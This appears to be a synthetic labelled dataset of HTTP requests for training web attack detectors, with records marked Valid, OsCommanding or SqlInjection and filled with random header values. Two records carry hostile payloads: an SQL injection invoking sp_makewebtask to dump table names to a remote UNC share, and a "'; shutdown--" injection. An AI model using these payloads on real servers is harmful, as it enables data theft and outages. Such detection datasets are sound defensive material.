From: 0ahnips1@eccfaTt.cz
If-Modified-Since: Tue, 20 Oct 09 16:54:00 GMT
If-Unmodified-Since: Sun, 17 Feb 08 14:27:24 UTC
If-Match: "5NK0mowQfjfXJ6JIx"
If-None-Match: *
If-Range: Sat, 08 Apr 06 08:05:31 GMT
Max-Forwards: 72
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Ytur ieceeric=xuqi
Authorization: Digest nonce
Range: 870431-,61-,-3837
Referer: http://www.lsieh.gov/nceostei/ot4te/et0eu.jsp
TE: trailers
Trailer: Accept
User-Agent: Mozilla/5.8 (compatible; MSIE 9.2; SunOS sun4u; id4ti2lie; neeahTt0; aanrehl)
UA-CPU: MIPS
UA-Disp: 635,8626,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 3.1 85.31.21.8, 7.8 97.138.228.86, 2.2 www.om7ge5c.js
Transfer-Encoding: gzip
Upgrade: ro4e/9.0
Warning: 567 www.enh7hD.js "3todocz5ta" "Tue, 13 Nov 07 04:16:24 UTC"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 5599119283941663287
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 9493
Start - Id: 25497
class: Valid
GET /iVA4wq.shtml?2mCv4S=union+em&sefk8f=858893819&RedeeolQo=a9ybcimeof&Aihdg9jicsrp=r&pmbxmf.U.1Ea=60245152&taslnspUeeUYT=r3ccCos&iicaihp=Ass4r&r03gt1odooyot=%5B%3DU+qt7IrltDk%40e&Tar=48726199&hi1amie2Ote=aL5h%40QAV&hsovSly6q=sRea HTTP/1.0
Host: www.Gdatel.de:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=2229
Client-ip: 152.83.39.65
Cookie: le=x1Q5;dpltewlnseepyu=Ao;qtu0eeeaohdSee= execil/ 2systemlibe8vbscriptsot;usalpsyaimtn=6029817;ftp51AG285R=esns
Cookie2: $Version="05"
Date: Sat, 07 Jun 08 10:11:52 UTC
ETag: "g@Tlm7kuAGjYMJrz@"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Wed, 07 May 08 19:04:15 GMT
If-Unmodified-Since: Thu, 25 Jan 07 14:53:45 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 24 Jul 06 20:56:20 CET
Max-Forwards: 79
MIME-Version: 7.5
Pragma: mE=ooadjnqa
Proxy-Authorization: ptss fnjE=diionlr
Authorization: swanct ll8yn=1esi
Range: 95-099091,5-
Referer: http://bab9iu.net/e4hg/vemate4/iheex.gz
TE: gzip;q=0.1,trailers
Trailer: Authorization
User-Agent: Mozilla/4.7 (compatible; Konqueror/9.5; Linux i386; mTr5v)
UA-CPU: 68000
UA-Disp: 0760,497,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: 7.9 162.192.16.169:690, FTP/7.6 www.s7efy.jpeg, 6.8 45.231.152.82
Transfer-Encoding: compress
Upgrade: ownr/0.4
Warning: 913 www.taBOb.html "tmfrufAeznpcrlreef" "Sat, 23 Jun 07 12:59:22 CET"
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 91549794
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25497
Start - Id: 29354
class: Valid
GET /rs0rsafonhleheratn/awtsHfsMDdctaNabare/Seerl0ibepl/nHjuDvWDJxD6/mtrag/0aOinput_wJepwget/hWte2awtEFgdBL5-/tchnnnbrhw/ieFs8usebsuesJoEA/rpof1ytsrtens.exe?uYcat-system8H=fafeccr&tyste2o0himhIi=u&hrenptmwcSru3=uTUUj&otnaym12Tf=+p%26%2Fezemn&edmAec0iy=58750961&firjtrh6om=es&tg6hearattiy0=staO7qoie HTTP/1.1
Host: www.Aty3.com
Connection: YhaXrt
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: d-nseeiuu9;q=0.4, 9eiar-r, dezHmr-6xehs;q=0.6, meeeimbs-Hcsf;q=0.2
Cache-Control: no-transform
Client-ip: 168.142.130.124
Cookie: ina7anwo=tHm-2h8z7w3r
Cookie2: $Version="01"
Date: Wed, 09 Jul 08 13:26:15 UTC
ETag: "I6lod4.WkBxa_3R"
Expect: 100-continue
From: muhbsl@whsoklhxlr.org
If-Modified-Since: Mon, 13 Dec 04 21:12:46 UTC
If-Unmodified-Since: Mon, 21 Mar 05 17:17:31 CET
If-Match: *
If-None-Match: "4ud5F_pYr9akNw_Cb"
If-Range: Tue, 11 Nov 08 07:28:15 CET
Max-Forwards: 1120
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: ghti edvur=shEe
Authorization: NTLM NW5uZGl0ZXNubzdvb25yYWdydHVld3JJbW1lZWk4ZXJidW5lcm9ybnlyZ1RzZWE=
Range: 415-76250
Referer: /hsir/cTEhura.asp
TE: chunked;q=0.2
Trailer: Proxy-Authorization
User-Agent: rr-52e http://www.soilYon.fr
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7326x099
Via: 5.1 www.4R7sreh.png:4, HTTP/8.4 www.1ePy.gif
Transfer-Encoding: uambf
Upgrade: t1r/7.5, zi7ebg/2.9, edtgoo/4.4, thi/8.9
Warning: 046 22.40.47.249:23 "ccrm3ttsosoh" 
X-Forwarded-For: 41.177.120.181
X-Serial-Number: 725402
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29354
Start - Id: 36421
class: OsCommanding
GET /grh5yioNfdias.aspx?ylIotesEeLiew=%3Cselectmailo&4emfahmCacsM0se=dursRo+d%3Cek%29yy0t3e&mt=OubtaE%25piR%3Abn&zrZG4E8=6922&JPkQ=%3Bomt4&b4ztnaMco8ae=vNusof&lfl9hnsiubrmeoe=085471&otrdiwnu=%5Dtoed&5oosxyic=2&ht=dCtbfNS&nleasHeronon=%27%3B+++EXEC++++master..sp_makewebtask++++%22%5C%5C129.208.243.168%5Cwyenevbo%5Cenol.gif%22%2C+++++%22SELECT+++*++FROM+INFORMATION_SCHEMA.TABLES%22 HTTP/1.0
Host: 204.20.91.224:80
Connection: keep-alive
Accept: text/html;q=0.2, application/rtf;q=0.3
Accept-Charset: windows-1250, windows-1252, us-ascii, x-mac-ce
Accept-Encoding: 
Accept-Language: qnrRgip-6e, iis-auyr, ttve1-n6rie
Cache-Control: min-fresh=4
Cookie: etntrae=innOdfdhOen7;esdteOYtpHiUvl=tksyehi;ntFte=9703;osewziflcog=603352
Cookie2: $Version="2"
Date: Fri, 28 Apr 06 12:02:52 UTC
Expect: 100-continue
If-Modified-Since: Sat, 08 Mar 08 24:21:51 GMT
If-Unmodified-Since: Fri, 18 Aug 06 22:48:31 CET
If-Match: *
If-Range: "gjwFm2apCzAIYeku"
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: NTLM dG1za2VudGxpeXR5ZWRSQWdodm9mcHpSdGVmWGlvbmpyZXRiZTM5bGt1
Authorization: Basic YWhlZXhkaXM6ck9vZWE=
Referer: /61see/euNtp.swf
User-Agent: Mozilla/4.3 (Machintosh; U; Mac OS X 6.8; no-ad; rv:1.0.2) Gecko/67275934
UA-Color: color16
Via: 0.5 www.wg4i.jpg, 2.7 2.162.77.216, FTP/2.4 www.3aubiu.tiff
Transfer-Encoding: compress
Warning: 123 www.r6hayneh.css:34967 "ekee0eeac6" "Fri, 19 Aug 05 20:22:44 CET"
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36421
Start - Id: 11320
class: Valid
GET /rnf/ezVsv2-veERB8GgGiF4e.html?xthlautlsirelri=e%3F%3Ey%24processing-instructionsoc HTTP/1.1
Host: www.snitqjnmes.com
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 205.97.76.207
Cookie: 96nk2=th 1&aWt d1xmles[inm;f5lhueueoh=c;2th=$so
Cookie2: $Version="77"
Date: Fri, 18 Aug 06 22:53:30 GMT
ETag: "Ecv8ajRCP5OFkTLKb"
Expect: 100-continue
From: 4uewao@tP0n0beotn.fr
If-Modified-Since: Sun, 07 Jan 07 06:19:03 GMT
If-Unmodified-Since: Mon, 03 Dec 07 05:40:40 UTC
If-Match: *
If-None-Match: "hewFx8CnypgDMw8vR"
If-Range: Tue, 06 Jan 09 04:40:10 GMT
Max-Forwards: 9357
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest nc=7C5cC0b1
Authorization: NTLM b25pTG5obzVBa2pjc2lydXJzazdzbmFubmZuaTJlYW5Iam1lT3A=
Range: 536428-,-28681,5449-8638
Referer: /tibqTt/lieteyje/ooEiiev/raco/l3otLiAg.zip
TE: gzip;q=0.6
Trailer: Date
User-Agent: Mozilla/5.7 (Machintosh; U; Mac OS X 4.1; tl-ae; rv:4.7.6) Gecko/55074127
UA-CPU: Sparc
UA-Disp: 8778,423,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x845
Via: 4.8 235.20.178.147, 4.9 www.odaAand.tiff:64342, HTTP/1.1 117.108.98.116
Transfer-Encoding: deflate
Upgrade: veer/3.0, d8snnM/4.8, nja/8.7, r8o/0.9
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 203.140.233.72
X-Serial-Number: 7492268797432274
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11320
Start - Id: 32971
class: Valid
PUT /u.PO@-BmC0/deesn7rn0/rggBiWK1dw1/ejfmXA-t2B/etz1gEnhtntnsquaAdrd/4Nr/eapmngnbemyle/deec/TyperlhOgi8I-spNE.asp? HTTP/1.1
Content-Length: 148
Content-Language: e,zsho,r
Content-Encoding: gzip
Content-Location: http://ce0aissi.be/rltnhlc/Ghwnnns/ssndtzts.sh
Content-MD5: ZnhvdXV0cnN0cnRSaXpycg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 May 06 01:31:05 GMT
Last-Modified: Mon, 01 May 06 19:13:18 CET
Host: 214.225.23.27:80
Connection: 3trnn7f
Accept: image/png, audio/x-wav;q=0.7
Accept-Charset: x-mac-turkish;q=0.6, isiri-3342;q=0.0, koi8-r, iso-8859-8-i
Accept-Encoding: 
Accept-Language: e-vedeu;q=0.3, eNseoxbe-Reivm, uws-ettm;q=0.0, hIdftopo-5mt;q=0.8, iy-nga21
Cache-Control: no-cache
Client-ip: 22.235.201.224
Cookie: jdivnamck43O=aohneadd2eidifsht;FiUL=32;cst= inull;de3exni=ypPa;asrxHh=sesnaw7gzntudatznh;rt61YCwrhcr=uiiTDwxVYL
Cookie2: $Version="24"
Date: Sun, 19 Apr 09 14:31:57 UTC
ETag: W/"Y6ejAg2dfslCrjM"
Expect: edwel=nstarS
From: eoiw@ba5rdx.uk
If-Modified-Since: Tue, 09 Mar 10 24:11:11 UTC
If-Unmodified-Since: Wed, 06 Dec 06 12:58:43 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 24 Aug 04 23:42:15 CET
Max-Forwards: 3
MIME-Version: 9.1
Pragma: 3m=za
Proxy-Authorization: Basic aXNTNzlyOnR0eHVl
Authorization: cRfyu 8zehufyb=tGs1au
Range: -430,201823-
Referer: http://snco.uk/tntims/nezFts/t6soswnM.tar.gz
TE: trailers,trailers,gzip
Trailer: From
User-Agent: 1hs0nron4o
UA-CPU: StrongARM
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 450x324
Via: 7.8 115.147.251.135, HTTP/0.6 64.160.14.54, 4.0 6.28.55.163
Transfer-Encoding: 2sje; n9zah=yCibtum2
Upgrade: eg7oe/1.7, Get5/4.2, ssawt/2.5
Warning: 171 244.244.50.187 "9tseoh3nt" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 62410
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sl4fuYogtinea=428&ssm5el=c&ee5usy=47456182&anthneednjme=8532&iw6=19&Rprocessing-instructionWTzZ=59&Dpofs=e&atanbsfu=3t aw;itln&ashusesos0dgr=dgera

End - Id: 32971
Start - Id: 41772
class: SqlInjection
GET /ePP9PT_C@1r/r9hhckxKk6r4Ev7/NTQRprocessing-instructionl1J_copy3/nh5t/ml/j@AQVXddzsHaKSlGh/t04zu_-4VBB-iHFr9As/mdwgetD0QTcA/ecykn7ytig1.aspx?iR=2132718052&pi4etaei=t.303s43&eotnrnt=ri7U9eyAsiSnhiuzwB&flarsiDfltt=e8luve&0Oyinske=739902&frominputHJSYJV4x=19077&5ooTnW=aeB%5Chshe%7EdfiV-eiu&lhecelttmaico=%27%3B+shutdown--&ykcsee3aPaAdi=pTpqX&Gvjs=eZe536FZp- HTTP/1.0
Host: 120.15.80.141:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-8;q=0.7
Accept-Encoding: compress, compress;q=0.0, identity
Accept-Language: m-tetebh4l, ookia-s;q=0.4
Cache-Control: no-cache
Client-ip: 141.135.3.12
Cookie: 2buSlhoiowjh=8709;EoSgaiesA0ciu=inahiiglsf0s;bunotttN=629;dasnlutea=l9Eugnetcatbgsounds+;YNyf=20890102
Cookie2: $Version="86"
Date: Wed, 02 Aug 06 17:30:45 GMT
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 30 Jul 09 08:38:33 GMT
If-Unmodified-Since: Fri, 29 Jun 07 20:14:16 CET
If-Match: *
If-None-Match: "Ha90nmG4HR1W1X-bW"
If-Range: *
Max-Forwards: 4729
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic eFN3ZXlpczp0ZWVybXRi
Authorization: NTLM bDZxZXdoeTV3NmRlYXNtZXNoZXJ1eWRlNmFsZGFodDVsbHR5Yg==
Range: 4234-490888,-164882
Referer: http://www.e0InlEai.cz/etya8.mspx
TE: chunked;q=0.9
Trailer: Upgrade
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 1.9; ms-1t; rv:1.7.2) Gecko/26690621
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: 5.5 www.6rsp7e.css, 3.0 144.140.49.88, 0.9 208.254.33.86
Transfer-Encoding: identity
Upgrade: baE/8.7, 0es9t/8.9, lisu/3.1, ncnHe/5.8, iuj/3.3
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41772
Start - Id: 455
class: Valid
GET /ugdg9xZPu0/rVZhO.73trXxb4zQH_/hdaaoreroi3hw5hoe6kp/stfrutsele/tmp7n./emxMyRXRQyaN/eJ9py/enTdCI6U.bin?8nnisaRliylue=96860978&rzadae7recr=55&tmdeor=43&lzIUTTI=0167&zdu6inei=cOj&dpmssytSATEn=div%3F9t&Vqpmail0hRnmolB=12&dsovitHusui=4reswa+pn&ddri2lbeti=4tab8ehcthtei&w0ns=nxqnnctdci4m&wsrhhfr1an8y=eilr7otr&elie5ifsm=lmsiobr&sen=6736800 HTTP/1.1
Host: www.ethfof5.org
Connection: r56Aam
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate;q=0.7, deflate;q=0.0, compress, deflate;q=0.8
Accept-Language: *;q=0.1
Cache-Control: Eytifj='ea'
Client-ip: 185.69.123.215
Cookie: e3qXtplJs2=tnixs1natr;dgr=mas;4eloe=twx
Cookie2: $Version="63"
Date: Fri, 27 May 05 13:17:27 UTC
ETag: W/"B@3zoCSPOBVvD4f"
Expect: tm6aa1jn
From: okeiE@bcbeit.biz
If-Modified-Since: Sun, 12 Nov 06 01:35:14 GMT
If-Unmodified-Since: Thu, 12 Jul 07 04:01:27 GMT
If-Match: *
If-None-Match: *
If-Range: "2dAOQztaBNhhIfH"
Max-Forwards: 0
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: efyoqn Rones=rurRhroe
Authorization: NTLM aFhhMXdldFJrYW1sYTZhdGxpZGxpblVjbHNkZXJlR3hnMXM=
Range: 502-,89-
Referer: /wa2iwmr/aIewl.jsp
TE: gzip;q=0.3
Trailer: If-Match
User-Agent: Mozilla/6.7 (X11; U; Linux i386 5.5; nh-ae; rv:5.1.0) Gecko/26030113
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7545x2141
Via: HTTP/8.2 232.223.185.6:2, 7.1 www.hnur4s.htm, 9.2 86.242.136.117
Transfer-Encoding: gzip
Upgrade: rn5css/5.8
Warning: 165 63.14.111.126 "qkeq62sh" "Sat, 26 Nov 05 06:33:06 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 9170010950
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 455
Start - Id: 20126
class: Valid
GET /ZQ/eeD1Arstt5Cu7/tt.U/iuniehitmm/682retOr5tdrO8sVIf/Udiv8homehtpasstfSwlN/beeEy5soInhHk2e/iyh_w9J5N4V/s0ezi3O/2uAXo9ZyVy@3mC.5j36.jpg?rytejeeE=6842699&AtCasss=tVxjWM6%40 HTTP/1.1
Host: www.odaenl.com
Connection: close
Accept: image/*;q=0.8, video/*;q=0.6, image/*;q=0.4
Accept-Charset: hz-gb-2312;q=0.1, iso-8859-8;q=0.9, x-mac-arabic;q=0.6, cp-950;q=0.7, x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 118.42.44.219
Cookie: ff=edsedeoE+lE;eo3ntdnuqdb=b<@ne Y;uSelt=bJ0LmIODHV;dmtic=3VjFZ
Cookie2: $Version="81"
Date: Sun, 26 Dec 04 18:06:49 CET
ETag: "qP_Tnn6QpX5rkd0-WvP"
Expect: n30oiss=srsm
From: np1ebr9@yntet.it
If-Modified-Since: Mon, 27 Sep 04 05:55:26 UTC
If-Unmodified-Since: Tue, 20 Oct 09 04:40:23 GMT
If-Match: "iPwl0Zw7uw7w--5"
If-None-Match: "fkQ4.ZkuLCPNpmF2r_"
If-Range: Thu, 23 Sep 04 23:35:58 CET
Max-Forwards: 31
MIME-Version: 9.3
Pragma: coti='weesh'
Proxy-Authorization: NTLM dEVldGlyYW5yeGlyYWV6dWVobnRUZG5uYTNOY2NhUm9yZXN0bA==
Authorization: aoMoA rbnU=YhsEEmt
Range: 48910-875971,804755-62
Referer: /ae2zgu2h/uws1clad/9annn/Sg1a.avi
TE: trailers
Trailer: Host
User-Agent: Mozilla/9.4 (compatible; MSIE 2.9; WinNT; ssfs; xsik; TaiRpanq)
UA-CPU: Sparc
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2245x9664
Via: 2.7 13.200.22.105:840, 8.6 43.23.220.102
Transfer-Encoding: eD5n
Upgrade: jtnwgT/9.0
Warning: 660 www.e06sbm.png:915 "itsTnmtqleDAXa" "Fri, 23 Dec 05 19:02:37 GMT"
X-Forwarded-For: 143.125.40.136
X-Serial-Number: 01250528765
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20126
Start - Id: 21945
class: Valid
GET /h3SUSw/e4lFX4.php4?daraidyeg1cr0=r3+Oe HTTP/1.1
Host: www.Sm2phSe.cz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-jp;q=0.8
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-age=35
Client-ip: 191.101.191.71
Cookie: xo=%u5iasdnaes8 ir
Cookie2: $Version="723"
Date: Sun, 03 Jan 10 15:29:21 GMT
ETag: W/"cB.CPcl.9laMIug"
Expect: whiieetc
From: slg5eH@arfeenAeg.net
If-Modified-Since: Sun, 13 Dec 09 01:10:20 CET
If-Unmodified-Since: Thu, 17 Sep 09 12:29:21 GMT
If-Match: *
If-None-Match: "Oox4k0HQ9JDAPH16eO4"
If-Range: Fri, 01 May 09 05:21:37 UTC
Max-Forwards: 2766
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic ZmVjb2tmTDpvbXBl
Authorization: Basic aTdpb2RGWDpyU2hOU2Nm
Range: -7,-7389
Referer: http://www.doha.biz/suhcw.cfm
TE: trailers,trailers,deflate;q=0.8
Trailer: If-Match
User-Agent: Mozilla/9.6 (compatible; Konqueror/6.4; Open BSD i586; snHdif2set; roceuh9)
UA-CPU: x86
UA-Disp: 069,983,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 350x171
Via: 3.1 95.103.80.107, HTTP/9.1 54.98.133.52:665, 8.1 www.ueimm.shtml
Transfer-Encoding: compress
Upgrade: eoa1/3.0, hiir/9.7, 4tf/2.3, u1ad/4.7
Warning: 945 www.u1eyergi.jpg:82873 "ihvut8ngwso" 
X-Forwarded-For: 20.222.130.202
X-Serial-Number: 09176432061314
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21945
Start - Id: 28457
class: Valid
GET /ef4KQCLu-hY/eAkh_jP5vu93EZ/hxAVTTKV/rsana.mspx?enMrDtcfhtw=ta&apeuTtec=tDr4pFx&au=57921193&zltSs=tFL3Yzw%40JI&XBR2T=r5ea&oontECiC1n=n&9bn4cg=nohaving+&nepDaf=ea&0grdi8eI=tnfg_j7O9 HTTP/1.0
Host: 24.96.88.144
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-9, ks_c_5601-1987;q=0.6, windows-1253, cp-950;q=0.7
Accept-Encoding: compress;q=0.4, deflate, deflate;q=0.4
Accept-Language: u-9dociems;q=0.5, hehnee-usSsot, nodaTn-yhf;q=0.7, ooahhke-n
Cache-Control: max-stale=6
Client-ip: 164.210.23.83
Cookie: hvaius=syRkKOrIw;snn=ac4tiseu;oh8oTseCMrc=2524
Cookie2: $Version="855"
Date: Tue, 12 Sep 06 18:27:10 CET
ETag: "4ohLRNGxY-E4_hL"
Expect: 100-continue
From: 3teotee@motpa.ch
If-Modified-Since: Mon, 01 Mar 04 14:26:49 CET
If-Unmodified-Since: Sun, 21 Feb 10 17:45:31 UTC
If-Match: *
If-None-Match: "TjPXLw.WISD28S5Qisi"
If-Range: "7IIMLdtbEnvOcEvI"
Max-Forwards: 3037
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: ieaahi nGwal=0Segtea
Authorization: Digest cnonce="ltk2"
Range: -25484,-49478,6-
Referer: /stl3AsD/43uirciA/zlocoo.png
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: hojtWsnrznrtE2
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2738x559
Via: HTTP/6.7 www.smusTDmh.gif, 0.8 www.hoeki.jpeg
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 966 101.43.142.203 "tcetitxnsoj" "Tue, 14 Oct 08 17:34:51 UTC"
X-Forwarded-For: 84.7.158.77
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28457
Start - Id: 22870
class: Valid
GET /OE3PezPW7vh/v4qZD3xp/BGxRqq4KnciPi3/13FBOg5u9/auVO1GpF62/SIojRhohe5ahoT0Ftm/e3d.png?h2a=90 HTTP/1.1
Host: www.he6Ru.net
Connection: close
Accept: video/*
Accept-Charset: us-ascii;q=0.1, x-mac-greek;q=0.2, windows-874
Accept-Encoding: compress;q=0.7, deflate, identity
Accept-Language: r1rlt-cleelie;q=0.0, qmimdTe-ejtws1;q=0.5
Cache-Control: max-stale=21623
Client-ip: 104.220.169.167
Cookie: eeae=t1in\Oo(rai;gOX2_tnEa5ZJ=nMI5GlNPb;anlfeeuroa=4
Cookie2: $Version="80"
Date: Fri, 16 Oct 09 16:42:54 UTC
ETag: W/"6nKcYtlxwrlR7G10i6h"
Expect: eoevCite
From: tooo@iHal.net
If-Modified-Since: Wed, 14 Mar 07 14:31:10 UTC
If-Unmodified-Since: Thu, 27 May 04 02:35:33 GMT
If-Match: "btmgPkWuEbX1JhJ"
If-None-Match: *
If-Range: "1Wi56sPd5H0Kzj2o"
Max-Forwards: 165
MIME-Version: 9.9
Pragma: msdrsdng='iIidstTm'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest realm
Range: -78,325-,-890033
Referer: http://www.ssspqoef.com/iess/tahsoet/ine4/aesDea/rTanuao.jpeg
TE: trailers
Trailer: Accept
User-Agent: EetHS2aohGbg
UA-CPU: StrongARM
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 134x6878
Via: 2.8 www.mz3n.png, FTP/7.7 www.uosgx.html, rcAalx/3.1 www.ktcho.tiff
Transfer-Encoding: gzip
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 68.104.33.155
X-Serial-Number: 7097539555408147
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 22870
Start - Id: 6631
class: Valid
POST /rZDNsPLCten/hCrjTJ1ok-aE2mPA.tiff? HTTP/1.1
Content-Length: 205
Content-Language: Acmvd,t
Content-Encoding: compress
Content-Location: http://sslHeote.com/9nli7r/ePsa/namsri4s.html
Content-MD5: aXdvU3RlYXJseWRldXdleA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Nov 08 06:02:45 CET
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: 153.238.99.237
Connection: inobce
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: r8-Ed3rur7o, er-sqV;q=0.8, aed-ll
Cache-Control: max-age=5
Client-ip: 58.254.214.0
Cookie: mTrobxItanouhii=s%ue;cmleiattNmrphd=0bHhoyqreoatlMiuc;gcrnpr6eapni=999107485;a3Ft91sc0KEmz=00588366
Cookie2: $Version="882"
Date: Sun, 13 May 07 21:42:24 GMT
ETag: W/"PJERZnLv-AkghuUrXwDr"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Sun, 21 Jan 07 06:00:38 UTC
If-Unmodified-Since: Wed, 17 Nov 04 24:20:52 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Feb 06 04:12:12 UTC
Max-Forwards: 78
MIME-Version: 0.0
Pragma: as='xreimoed'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest cnonce="eeinnoTd"
Range: -08,-241,7-856
Referer: /non67it/hHstohnc/4tedn/2Atea.asp
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: zrtear/2.5.7
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: FTP/7.2 www.3fencdE.png, HTTP/8.4 236.126.17.158, HTTP/8.9 83.143.199.90
Transfer-Encoding: identity
Upgrade: 9oroqh/1.7, c1o6d/3.0, tOawr/4.2
Warning: 372 131.35.101.58 "dAwcwc3hitToiy" "Wed, 29 Mar 06 22:18:03 GMT"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

5a=e9asai6e&ehNfnehrd4u=37&I6aa=F|p&hgiisal='uHbselectjhe&srrugsos8rhl3o=6d&imeaCgqipt=83769566&Adbdtyl3lw=aim&a1go=4ape&Oa=1GXI&o7raiko=ogstaSe&bltt=od_nOjZ&erfta=262&s2LWboot.iniSV6=eMhome&e55=0c/t

End - Id: 6631
Start - Id: 33832
class: Valid
PUT /ttoamua3/tqtotdcrawis/du4/eebReetsretel4dyH/zUtmpuJnetcatUTeL2/@y.DK@-M/uhap/hQMm7lS6/qrhdsa/e7d0lmo/n72qZSx3mREmbW.swf? HTTP/1.0
Content-Length: 25
Content-Language: F,ie
Content-Encoding: identity
Content-Location: /rllid/065Dumm/ue5c1awD/ytule.gz
Content-MD5: aHlSZGNlb09yYWVlVGx0Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 05:09:24 GMT
Last-Modified: Sat, 19 Aug 06 22:10:11 CET
Host: 122.88.118.117
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, iso-8859-5;q=0.2, koi8;q=0.9
Accept-Encoding: *
Accept-Language: e-ccea, i3qawmDe-bqn8hOz;q=0.1, o-nlyze;q=0.9, tdK-boGI;q=0.8
Cache-Control: no-store
Client-ip: 39.102.236.219
Cookie: homepLIopen75pyOunions=ie6tg;emx4iug=33_qlo_5zwi;ahh=eteoze8sueqdDh4hq;mbhstst3s=a;cnskrhcgsrid=748
Cookie2: $Version="208"
Date: Sat, 03 Nov 07 24:20:13 GMT
ETag: "45kwj7_F8a73IJ1"
Expect: iehm=aTim;nWwnjnIN
From: npnftoP@aNndSftP.be
If-Modified-Since: Tue, 21 Mar 06 06:19:26 GMT
If-Unmodified-Since: Tue, 26 Dec 06 23:33:42 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 05
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: lecc hubuhe=ose0hecb
Authorization: NTLM dG9weTFmYWVuUmFlZHg5aHNicnZ2c3dhYXJzYzZlc2gyeA==
Range: 62-866999
